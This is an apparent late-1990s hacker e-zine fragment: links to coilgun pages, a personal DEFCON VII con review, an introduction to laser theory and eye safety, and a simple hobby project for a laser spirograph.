http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunMainCircuit.jpg http://www.oz.net/~jjhansen/coilgun/mark1/spread1.htm http://www.oz.net/~jjhansen/coilgun/mark1/spread2.htm http://www.oz.net/~jjhansen/coilgun/mark1/spread3.htm http://www.intap.net/~j/coilgun/index.shtml And, if all of this confuses you, just go here: http://www.iinc.com/~obwan/htc/technogy/s_craft/nailsh.htm ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Defcon VII review. blurred edition. zhixel [no-email provided] after arriving at the Las Vegas airport, I generally stood around and waiting for my ride to pick me up.. thirty minutes later I got tired of waiting and manage to take a shuttle to the Alexis park.. and within five minutes ran directly into teklord (who's kind of hard NOT to run into, in the first place. :D ) I followed teklord around for part of the night, along with some green braided girl who went by "illuminati" or something. (I'd continue to bump into and greet her for the rest of the con) I ended up running back to the hotel lobby, buying an overpriced jolt and happening onto barkode (my ride) and some redheaded guy called "Erik" (which took five seconds for me to realize THAT was Felix.) I yelled at barkode and shoved my backpack at him, which promptly identified myself as "zhixel", and listened to his story about trying to find me at the airport. From there on we ended up going back to his room, and spending the rest of the early morning partying at some other room. It wasn't until 5 something that I ended up trying to sleep on the couch back at our room. Friday. wake up, prepare for the day and run off with Barkode to get our badges & etc. We manage to track down pinguino (who takes a whole five minutes to realize who I am and tackle me) and who I find out later to be secret squirrel. I follow pinguino around, talk to the goons about setting up the penguin palace table and end up helping drag stuff in as well. We also went back to pinguino's room where I borrowed my design consulting skills to the penguin palace sign, along with running from ping. the rest of the day was pretty much a blur. later afternoon I caught Barkode & skrike and went back to our room, meeting logicbox & monkeygrl at the 3rd pool along the way. I went up and "introduced" myself to both logic and monkey (which mostly involved my smacking them in the head with my new T-shirt). We went back to our room and talked it up. I showed off my cow as well. later a lot various people showed up at the room and we ordered Chinese food.. and many proceeded to get rather drunk. some guy by 'runt' showed up later.. and continued to get amazingly fucked up, spew all over barkode's bed, and pass out and get dragged out and later taken to the hospital .. fun. I followed several people around, including Felix, before returning to the room, watching TV, talking to the cleanup service. barkode & prophet & signine showed back up at various times and we all slept. I don't quite remember how I slept, but needless to say it was uncomfortable. I think I gave up and took barkode's bed before he came back and I stole his sheet and took the floor. unsure. perhaps that was Saturday night. Saturday. more blurriness. I hung out with some kid by 'kp2' carrying around his sparc & etc. bought more shirts. I also really wanted to go with pinguino and gang to the star trek experience, but my feet really hurt by that time.. so I hung around someplace. Probably with the tananda 804 girl that I met the first day (which was a surprise), and painting her nails. I also recall talking to psykocat & various people back at the room, which was a total blast. logic, signine, prophet, barkode, & I slept back at the room. I think... Sunday. more blur. I recall hanging with penguin palace some more. getting a tori-do CD from ping, sitting at the table with pesto offering to sell various things for three dollars. I wandered around, hung out with skully, sloth, asphyxia, and some others in their room, resisted peer pressure.. ended up following tananda for most of the night, we joined some hack Canada people at the AmeriSuites hotel.. before going back to the pool party at the Alexis park.. I left and went back to tanda's room, and got some sleep before we had to leave around six in the morning.. we took a taxi to the airport and had to run to catch our flight.. The details of Saturday and Sunday are somewhat blurry, mostly cause I can't remember the details or when what happened.. I didn't even get drunk either. heh. I do remember sitting up front and center when Carolyn Meinel & Some other guy got into an argument over capture the flag, and both ended up getting kicked out. Most awesome. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ LASERs - Theory and Safety Secret Squirrel [ssq@penguinpalace.com] -=[ INTRODUCTION ]=- This document wasn't written to provide every bit of knowledge that exists on LASERs, but rather to give a general overview of how they work, and some safety issues that you should be aware of when working with LASERs. There is a more complete (but not totally complete :) document that I wrote which appears in System Failure Issue #9, which is archived at http://www.penguinpalace.com/ A LASER is a light beam. This beam has 2 properties that other light sources don't have. LASER beams are both monochromatic (a single color) and coherent (all the light waves are the same, going the same direction, and the same phase). The difference between LASER light and a regular light bulb is like the difference between a single tone and static on your TV. Here is a short list of some of the larger moments in LASER history: 1917 Einstein first comes up with the theory of a LASER 1954 The first Microwave LASER (termed MASER) 1960 First optical LASER 1966 First gas dynamic LASER 1984 First X-RAY LASER 1993 Gas contact plasma LASER As you can see it has been nearly 100 years that the idea of a LASER has been around. Now, to a large degree we are very dependent on the LASER. From CD players, to Fiber Optic communications (both voice and data), to LASER light shows, to industrial cutting and welding, to medical and surgical procedures, the list goes on. The unique characteristics of LASER light - monochromicity (the light is all the same color or wavelength) coherence (all the waves are in the same phase), and directionality (the beam is either well collimated at the beginning or can be easily collimated) make this all possible. But what is a LASER really? Well the word LASER is an acronym for Light Amplification by Stimulated Emission of Radiation. Light Amplification is pretty easy to figure out what it means. To take a light source and make it stronger. Stimulated Emission of Radiation is a little trickier. This is what Einstein first came up with back in 1917. He theorized (and it was later proven) that if you take a molecule and stimulate it to an excited state and then hit it with a photon, it would release a photon of the same wavelength, phase and direction. When this photon is released the molecule will return to its unexcited state. As more and more molecules release photons more and more photons get released as they bounce around in the lasing medium, and finally they come out and the LASER beam is there. The output of a LASER can be pulsed or a continuous beam. It can be visible, Infrared, or Ultraviolet. Its power can be less than 1 milliwatt, or millions of watts. With all these differences, there are a few things that all LASERs have in common: 1. A lasing medium. This can be a solid, liquid, gas or semiconductor which can by pumped into a higher state. It must be possible to boost the majority of the lasing medium to an upper energy state called a population inversion. There must be a downward transition triggerable by stimulated emission 2. A means of pumping energy into the lasing medium. A flash on a ruby rod for instance AC or DC charge on a gas LASER 3. A resonator. In most cases this is a pair of mirrors, one at each end of the LASER, which allows stimulated light to bounce back and forth through the lasing medium. This is called a Fabry-Perot cavity. Nitrogen LASERs have a mirror only at one end. -=[ SAFETY ]=- I am sure that most of you have heard that you shouldn't shine a LASER into your eye (or anyone else's for that matter), and some of you have probably tried to see if you can. While you may have noticed that there is a momentary blindness created when you do that, the risk of more permanent damage is high. A coliamted beam represents the rays from an object at infinity. If you eye is focused for distance and you shine it in your eye, you eye will focus it onto a very tiny spot on your retina, which can burn your retina, causing permanent damage. The action of the focusing is much like taking a flash light with an adjustable beam. If you spread it out you can see a lot of stuff, but none of it is very bright. If you adjust the beam so that it falls onto a small spot (this works well with maglites) then that spot is bright, and you can see it more easily. Well the output of the flashlight is the same, its because its all focused onto a small spot that it appears more powerful. So even a weak laser pointer can cause damage depending on your eye, and how its focused. Now, lets talk about power output. Most laser pens are under 5mW. That may seem like a small amount, especially since you have 100W light bulbs in your house. But what you may not be aware of is that 100W light bulb refers more to the current pull than the brightness of it. Only about 5-10W are output in the visible spectrum (most of the rest is given off in the IR portion of the spectrum). This light is spread out in all directions (remember the maglite above?) and the power density is very small. At 10cm from a 100W light bulb (assuming the visible portion is 6W) the power density would be about .05mW/sq. mm. At 1m (3.3 feet) it would be about .0005mW/sq mm. A 5mW LASER (like most pen LASERs are) would actually be brighter at 1m, and closer it may be more intense (because the beam will spread out in a cone, when you are closer the beam hits a smaller spot, and so it could be 10,000 times more intense if its only 1mm in diameter). At mid-day the sun at the Earth's equator on a clear day has a power density of about 1mW/sq mm. Very low power LASERs can be as damaging to your eye as the sun can. With that said, I will now like to point out some good practices when working with LASERs. Always wear goggles. There are certain types that work better for certain LASER power outputs as well as the color of the beam. You want to prevent the beam from hitting your eye although preventing other stuff from hitting your eyes when you are making a LASER (or other project) is also a good idea. Never point a LASER at anyone. This is actually a law in many states now. It is considered assault if you shine a LASER onto someone and a lot of police officers really do not like it because it looks like a LASER sight that may be a on a gun. If you have a LASER show, keep the LASER above everyone else. It is a law (at least in most US states) where if you do a LASER light show, you must have the LASER itself at least 15' about the ground, and must shine it onto a target at least 15' above the crowd. This is to prevent accidental exposure to the beam. This is also a good idea since you never know where the beam is going next (when you are watching the show :) and you never know when the person next to you is going to bump into you pushing you in front of the beam. Accidents happen when you aren't watching for them. If you knew when an accident was going to happen, you would be able to prevent them. By their nature you don't know when they are going to happen, and as such cannot prevent them from happening (all the time). Because of this, if you are going to make a quick change to something, follow common sense. If you are working on a LASER unplug it. It may be that you spill your soda onto the power switch, which causes the LASER to fire, and it hits a mirror and ... Or any number of other things. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ LASER Spirograph Secret Squirrel [ssq@penguinpalace.com] You should have some familiarity with a LASER by this point, so I wont explain here basic safety, or much about how a LASER works (and for the most part that is irrelevant to this article). All that you need to know is that a LASER shoots a beam of light in 1 direction, and how to make it do that (by hooking it up to the correct power source). Because power supplies vary from LASER to LASER, I will not cover that here, that information should be included in your LASER, or should be available from the manufacturer of the LASER. What I will cover is how to make a cheap LASER light show system. While this system wont draw text on a wall, it will create a neat pattern, which is somewhat configurable. This is a good first LASER project as well, because its cheap, and easy to make. First lets cover some basic facts. When you power up the LASER a beam goes in 1 direction. That beam doesn't bend, or curve under normal conditions. If a LASER beam hits a mirror, it will bounce off at the inverse of the angle of incidence. What this means is that if you hit a mirror at 45 degrees, it will bounce off at 45 degrees, but instead of coming straight back, it will continue on just bending slightly. See illustration below: LASER origin Reflected path \ / \ / \ Z / \ / X \ / Y ------------------- mirror Another way to proof this, is that angle X + Y + Z == 180. This is even true if the beam is straight at the mirror, because X=90 Y=90 Z=0. Armed with this knowledge, you can see how its easy to draw a circle. Move the mirror so that the LASER is reflected onto a wall, and the spot where it hits is a circle. If you move the mirror fast enough, it will appear to be a solid line, and not a dot. Now, one circle alone doesn't make a Spirograph. A Spirograph is really a small circle moving around in a large circle. So to do that we need to add another mirror. This mirror needs to get the reflected path from the first mirror. This will cause the Spirograph to appear on the wall. If you are playing with lasers and mirrors already, you may notice that its easier to get the reflected beam into a smaller mirror if the mirrors are close together. Using this knowledge you can purchase smaller mirrors when you go to assemble the project. Now, to make the mirrors move in a way favorable to cause the beam to go in a circle, you should epoxy them onto the shaft of the motor at a slight angle. Too much angle and they will make a really big circle, and you may have problems getting the beam to stay on the other mirror. Too small of an angle and it wont make a large circle, and it wont be that impressive. I suggest between 2-5 degrees for most applications. Supplies needed: 1 LASER (can be a LASER pen, much like Target sells for $5-$10) 2 Mirrors (front surface mirrors are best, but for this, it doesn't matter that much) 2 Motors (these must be variable speed motors - should work off 9v) 2 100k potentiometers 1 9v Battery connector 1 Case (optional, and you may want to get this after you assemble everything so you know exactly what size to get for your final project) Some epoxy Some wire to connect the battery, motors and potentiometers Because it would be very difficult to express this in an ASCII drawing I am not even going to try. Instead I have included a .GIF image of the schematics. This is a really simple project, and shouldn't take that long to build. For the mirrors you can try a local art & craft store, or get good ones for LASER projects (and some other goodies) at places like http://www.mi-lasers.com/ They typically have mirrors, scanners, etc to make some neat effects if you want to play a little. They also have fog-in-a-can, which makes the beam more visible. Radio Shack should have everything else that is needed for this project. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -EOF